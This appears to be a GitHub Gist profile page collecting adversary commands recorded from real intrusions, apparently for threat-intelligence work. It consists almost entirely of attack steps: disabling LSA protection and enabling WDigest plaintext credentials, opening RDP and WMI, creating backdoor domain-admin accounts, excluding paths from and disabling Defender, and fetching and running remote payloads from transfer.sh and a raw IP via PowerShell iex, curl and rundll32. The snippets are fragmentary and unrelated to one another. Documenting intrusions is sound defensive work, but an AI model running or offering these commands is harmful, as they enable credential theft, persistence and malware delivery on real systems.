Skip to content

Instantly share code, notes, and snippets.

View Purp1eW0lf's full-sized avatar

Dray Agha Purp1eW0lf

View GitHub Profile
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\nvspbind" /v SystemComponent /t REG_DWORD /d 1 /f
reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA /v RunAsPPL /t REG_DWORD /d 0 /f
reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\nvspbind" /v SystemComponent /t REG_DWORD /d 1 /f
netsh advfirewall firewall add rule name="rdp" dir=in protocol=tcp localport=3389 action=allow
netsh advfirewall firewall set rule group="windows management instrumentation (wmi)" new enable=yes
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
powershell -command \"iex ((New-Object System.Net.WebClient).DownloadString('https://transfer[.]sh/GElU1LmvbS/injcet.ps1'))\"
# Check for Administrator rights
if (-NOT ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] 'Administrator')) {
Write-Host 'Please Run as Administrator!' -ForegroundColor Red
Exit
}
# Check and return current user name
$currentUserName = [System.Security.Principal.WindowsIdentity]::GetCurrent().Name.Split('\')[1]
# Paths
# Excerpt from Application.evtx EventID 0
EventData:
Data:
- "Transferred files with action 'Transfer':\r\nRunSchedulerTask.ps1\r\nRunSchedulerTaskOnce.ps1\r\n\r\nVersion: 22.10.11109.8417\r\nExecutable Path: C:\\Program Files (x86)\\ScreenConnect Client (9dd8b1107d6a42d9)\\ScreenConnect.ClientService.exe\r\n"
Channel: Application
EventID: 0
EventID_attributes:
SystemTime: "2024-02-23T04:06:06Z"
net user /add default test@2021! /domain
net group \"Domain Admins\" default /add /domain
net group \"Enterprise Admins\" default /add /domain
net group \"Remote Desktop Users\" default /add /domain
net group \"Group Policy Creator Owners\" default /add /domain
net group \"Schema Admins\" default /add /domain
net user default /active:yes /domain
net user /add default1 test@2021! /domain
net user /add default1 test@2021! /domain
# Downloaded from hxxp[://]minish[.]wiki[.]gd/c[.]pdf
#Exclude directory in Defender
powershell.exe Add-MpPreference -ExclusionPath C:\\programdata -Force
#Deploy beacon
rundll32.exe c:\\programdata\\update.dat UpdateSystem
$listi = 'hxxps[://]transfer[.]sh/UFQTwgYszH/config14[.]json',
\'hxxps[://]transfer[.]sh/ATVMNG5Pbu/config13[.]json',
\'hxxps[://]transfer[.]sh/s27p8BcTxi/config12[.]json',
\'hxxps[://]transfer[.]sh/ojw6aKoA4A/config11[.]json',
\'hxxps[://]transfer[.]sh/lyEkHLGt03/config10[.]json',
\'hxxps[://]transfer[.]sh/8l4d5qR39o/config9[.]json',
\'hxxps[://]transfer[.]sh/xkIMWnocQH/config8[.]json',
\'hxxps[://]transfer[.]sh/Db5eUfqKP9/config7[.]json',
\'hxxps[://]transfer[.]sh/L1e30KShXP/config6[.]json',
\'hxxps[://]transfer[.]sh/w2Y0iuEKiY/config5[.]json',
powershell -command \"iex ((New-Object System[.]Net[.]WebClient).DownloadString('hxxps[://]transfer[.]sh/gUHRYTNxj8/injcet2[.]ps1'))\"
curl hxxp[://]minish[.]wiki[.]gd/c[.]pdf -o c:\\programdata\\update[.]dat
#adversary excluded directories and neutralised Defender
powershell -ep bypass -c \"Set-MpPreference -DisableRealtimeMonitoring $true;
Set-MpPreference -ExclusionPath C:\\Windows\\Temp;
#then downloaded their file
Invoke-WebRequest http://159[.]65[.]130[.]146:4444/svchost.exe -OutFile C:\\Windows\\Temp\\svchost.exe;
C:\\Windows\\Temp\\svchost.exe